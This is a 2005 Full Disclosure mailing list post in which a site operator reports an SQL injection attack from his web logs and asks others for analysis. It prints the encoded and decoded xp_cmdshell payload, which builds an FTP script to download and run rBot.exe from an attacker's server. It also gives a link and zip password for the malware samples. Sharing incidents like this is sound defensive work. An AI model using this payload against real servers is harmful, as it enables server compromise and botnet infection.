Full Disclosure mailing list archives
SQL injection worm ?
From: "Maxime Ducharme" <mducharme () cybergeneration com>
Date: Wed, 5 Jan 2005 12:22:54 -0500
Hi list, we receveid a particular SQL injection attack on one of our site. Attack looks like : 2005-01-05 14:39:20 24.164.202.24 - W3SVCX SRVNAME x.x.x.x 80 GET /Nouvelles.asp id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68 %65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7 8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op en%20217.199.183.122%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed% 5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73% 68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25% 5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52.. %78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2 5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7 8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5 Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..% 78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45 %52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32% 5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6 3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 attacked.web.site.com - - - HTTP request contains only 2 fields (beside HTTP method) : Connection: Keep-Alive Host: attacked.web.site.com (I obviously replaced the name of the site). Decoded SQL injection looks like : exec MASTER..xp_cmdshell 'mkdir %systemroot%\system32\Macromed\lolx\'; exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo USER hahajk hahaowned >> %systemroot%\system32\macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo get rBot.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'ftp.exe -i -n -v -s:%systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell 'del %systemroot%\system32\Macromed\lolx\blah.jkd'; exec MASTER..xp_cmdshell '%systemroot%\system32\Macromed\lolx\arcdlrde.exe y.y.y.y is a foreign IP in Europe which host FTP an WWW server. I sent a notice this this site sysadmin about the situation. I have been able to connect to this FTP with the account hahajk/hahaowned (which do not seem legit to me ...) and download suspicious files. I mirrored them here : http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip zip pass is 968goyw439807r3qw 24.164.202.24 is on rr.com networks, they have also been advised. I know rbot.exe is known to be Randex worm, but i'd like that have some other results / analysis. I also found a "test.asp" file which contains the Spybot worm. Weird thing is, I searched for this hosts's activity on every server and every firewall we run, and I only see 1 TCP connection which is the prepared SQL injections attack, nothing else. Anybody see similar activity ? I'm asking since I want to know if we are targeted by someone of by a worm like Santy of use search engines to find vulnerable ASP scripts. Thanks in advance Happy new year to everyone ! Maxime Ducharme Programmeur / Spécialiste en sécurité réseau _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- SQL injection worm ? Maxime Ducharme (Jan 06)
- Re: SQL injection worm ? bugtraq (Jan 05)
- Re: Re: SQL injection worm ? Willem Koenings (Jan 06)
- Re: [Dshield] SQL injection worm ? Maxime Ducharme (Jan 19)
- Re: SQL injection worm ? bugtraq (Jan 05)